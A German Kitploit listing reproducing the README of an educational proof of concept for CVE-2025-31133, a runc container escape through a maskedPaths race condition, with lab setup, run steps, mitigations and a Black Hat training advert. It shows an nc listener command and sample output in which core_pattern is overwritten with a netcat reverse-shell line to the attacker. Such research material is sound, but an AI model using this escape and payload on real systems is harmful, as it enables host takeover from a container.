Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Learn-about-cve-2025-31133-poc — Lehrreiches Proof-of-Concept für CVE-2025-31133, einen runc-Containerausbruch durch eine maskedPaths-Race-Condition. Beinhaltet Labor-Setup, Exploit-Skript und Anleitungen zur Schadensbegrenzung für Sicherheitsforscher. | Kitploit
Tools/GitHubGitHub/c-h4ck-0/learn-about-cve-2025-31133-poc
Container-SicherheitSchwachstellenanalyseExploitationLernen & BildungContainer-AusbruchLabs & Praxis
GitHubc-h4ck-0/learn-about-cve-2025-31133-poc

Learn-about-cve-2025-31133-poc

Lehrreiches Proof-of-Concept für CVE-2025-31133, einen runc-Containerausbruch durch eine maskedPaths-Race-Condition. Beinhaltet Labor-Setup, Exploit-Skript und Anleitungen zur Schadensbegrenzung für Sicherheitsforscher.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
23vor 4 MonatenNoch nicht geprüft

Learn-about-cve-2025-31133-poc

Übersicht

Eine Proof-of-Concept-Demonstration und Lernumgebung für CVE-2025-31133, eine Sicherheitslücke in runc, die das Umgehen des maskedPaths-Schutzes durch eine Race-Condition ermöglicht. maskedPaths dienen dazu, Container am Zugriff auf sensible Dateipfade des Host-Dateisystems zu hindern.

https://github.com/user-attachments/assets/d7b4ea43-6cab-4ac5-bb07-08bc46479910

👉 Dieses Repository ist ein praktisches Beispiel für die genauen Forschungsmethoden und -techniken, die im Black Hat Training vermittelt werden:

Wenn Sie das interessant finden, ist das nur die Spitze des Eisbergs.

Offensive Container Security: Ein Meisterkurs zum Durchbrechen der Grenzen

📅 Black Hat USA 2026 Trainingstermine:

1.–2. August

https://blackhat.com/us-26/training/schedule/index.html#offensive-container-security-a-masterclass-in-breaking-the-boundaries-50910

3.–4. August

https://blackhat.com/us-26/training/schedule/index.html#offensive-container-security-a-masterclass-in-breaking-the-boundaries-509101770251750

Details zur Schwachstelle

  • CVE ID: CVE-2025-31133
  • Komponente: runc (Container-Laufzeitumgebung)
  • Angriffsvektor: Race-Condition in der Handhabung von maskedPaths
  • Auswirkung: Container-Ausbruch

Funktionsweise

Der Exploit nutzt eine Race-Condition aus, bei der:

  1. Ein Container ist mit maskedPaths konfiguriert, um sensible Dateien zu schützen (z. B. /proc/sys/kernel/core_pattern)
  2. Während der Container-Initialisierung kommt es zu einer Race-Condition zwischen:
    • Dem Löschen eines Geräteknotens (/dev/null) im Container-Rootfs
    • Dem Neuanlegen dieses Geräteknotens
  3. Dieses Zeitfenster ermöglicht es, den maskedPaths-Schutz zu umgehen
  4. Ein Angreifer kann in geschützte Dateien schreiben, die maskiert sein sollten

⚠️ Haftungsausschluss

Dieses Repository dient ausschließlich Bildungszwecken.

  • Nur in isolierten, kontrollierten Umgebungen verwenden
  • Nicht gegen Systeme verwenden, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben
  • Der Autor übernimmt keine Verantwortung für Missbrauch dieses Codes
  • Dieser Exploit kann Systeminstabilität oder Datenverlust verursachen

Voraussetzungen

  • Linux-System (Ubuntu empfohlen)
  • Root-/sudo-Zugriff
  • Internetverbindung
  • Grundlegendes Verständnis von Container-Laufzeitumgebungen und Sicherheit

Einrichtung

1. Dieses Repository klonen oder herunterladen

root@kitploit:~
git clone https://github.com/C-h4ck-0/Learn-about-cve-2025-31133-poc.git
cd Learn-about-cve-2025-31133-poc

2. Das Lab-Setup-Skript ausführen

Das Skript lab-setup.sh führt Folgendes aus:

  • Abhängigkeiten installieren
  • Eine angreifbare runc v1.2.0 einrichten
root@kitploit:~
chmod +x lab-setup.sh
./lab-setup.sh

3. Einrichtung überprüfen

Überprüfen, ob die angreifbare runc-Version installiert ist:

root@kitploit:~
runc --version

Sie sollten Version 1.2.0 oder ähnlich sehen.

Ausführen des Exploits

Grundlegende Verwendung

  1. Starten Sie einen Listener auf Ihrem Angreifer-Rechner, um die Reverse-Shell zu empfangen:
root@kitploit:~
nc -lnvp <PORT>
  1. Führen Sie das Exploit-Skript aus:
root@kitploit:~
chmod +x cve-2025-31133-exploit.sh
./cve-2025-31133-exploit.sh
  1. Geben Sie die erforderlichen Informationen ein, wenn Sie dazu aufgefordert werden:
    • IP-Adresse des Angreifers
    • Port des Angreifers (auf dem Ihr Listener läuft)

Erwartete Ausgabe

Bei Erfolg sollten Sie Folgendes sehen:

root@kitploit:~
[*] Compiling race condition exploit binary...
[*] Starting exploit attempts...
[*] Target: /proc/sys/kernel/core_pattern
[*] Backing up /proc/sys/kernel/core_pattern...
[*] Backup created at /tmp/core_pattern.bak
[*] Current content of target:
|/usr/share/apport/apport -p%p -s%s -c%c -d%d -P%P -u%u -g%g -F%F -- %E

====================================================
[*] Testing delay: 5 microseconds
====================================================
X..
[+] ========================================
[+] SUCCESS! Exploit succeeded.
[+] ========================================
[+] Original content:
|/usr/share/apport/apport -p%p -s%s -c%c -d%d -P%P -u%u -g%g -F%F -- %E
------------------------------------------------
[+] Modified content:
|/bin/nc.traditional <ip-address> <port> -e /bin/bash
------------------------------------------------
./exploit.sh: line 148:  7068 Segmentation fault      (core dumped) sleep 5
[*] Restoring original content...
[*] Restoration complete.

Es sollte eine Reverse-Shell-Verbindung zu Ihrem Listener hergestellt werden.

Gegenmaßnahmen

Um sich vor dieser Schwachstelle zu schützen:

  1. Aktualisieren Sie runc auf eine gepatchte Version (v1.2.1 oder später)
  2. Halten Sie Container-Laufzeitumgebungen regelmäßig auf dem neuesten Stand
  3. Wenden Sie das Prinzip der geringsten Privilegien an – führen Sie Container in einem Nicht-Root-Benutzernamespace aus

Referenzen

  • Mailing-Archiv
  • Schwachstellen-PoC GitHub Repository

Hinweise

  • Der Exploit erfordert möglicherweise mehrere Versuche, aufgrund der Natur der Race-Condition
  • Die Erfolgsrate hängt von Systemlast und Timing ab
  • Das Skript stellt das ursprüngliche core_pattern nach erfolgreichem Exploit automatisch wieder her
  • Die Bereinigung erfolgt automatisch über Trap-Handler

Lizenz

Dieses Projekt wird zu Bildungszwecken bereitgestellt. Verwenden Sie es verantwortungsbewusst und ethisch.


Denken Sie daran: Nutzen Sie Sicherheitsforschungswerkzeuge stets verantwortungsbewusst und nur in Umgebungen, die Ihnen gehören oder für die Sie eine ausdrückliche Erlaubnis zum Testen haben.

Tool herunterladen